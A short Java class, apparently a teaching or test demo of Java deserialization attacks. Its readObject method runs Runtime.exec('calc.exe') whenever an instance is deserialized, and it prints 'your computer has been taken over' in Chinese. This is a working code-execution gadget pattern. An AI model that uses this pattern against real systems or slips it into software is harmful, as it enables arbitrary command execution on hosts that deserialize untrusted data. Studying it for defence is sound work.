package com.stx.test.serialize.evilPackage;

import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.Serializable;

/**
 * packageName com.stx.test.serialize.evilPackage
 *
 * @author YangYi
 * @className EvilPack
 * @date 2025/10/7
 * @description TODO
 */
public class EvilPack implements Serializable {
    private static final long serialVersionUID = 1L;

    private void readObject(ObjectInputStream in) throws Exception{
        in.defaultReadObject();
        executeMaliciousAction();// 放入恶意代码
    }
    private void executeMaliciousAction(){
        try {
            // 打开计算器
            Runtime.getRuntime().exec("calc.exe");
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
        System.out.println("你的电脑被控制了");
    }

}
